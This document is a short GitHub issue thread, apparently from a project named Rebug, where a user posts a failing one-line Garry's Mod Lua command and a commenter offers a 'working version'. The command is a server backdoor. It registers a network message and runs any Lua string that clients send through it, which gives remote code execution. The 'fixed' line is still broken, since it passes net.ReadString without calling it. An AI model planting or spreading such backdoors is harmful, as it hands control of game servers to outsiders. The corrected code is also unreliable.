### ISSUE TITLE
error?

### ISSUE THREAD

**Issue by kenny3dcreations** [ProjectRebug/RebugV2-Release#9]
lua_run util.AddNetworkString("REBUG")net.Receive("REBUG"),function()RunString(net.ReadString())end)
> util.AddNetworkString("REBUG")net.Receive("REBUG"),function()RunString(net.ReadString())end)...

[ERROR] lua_run:1: unexpected symbol near ','

**Comment by Void09** [comment]
Here is a working version of the luarun
util.AddNetworkString("rebug")net.Receive("rebug",function()RunString(net.ReadString))end)
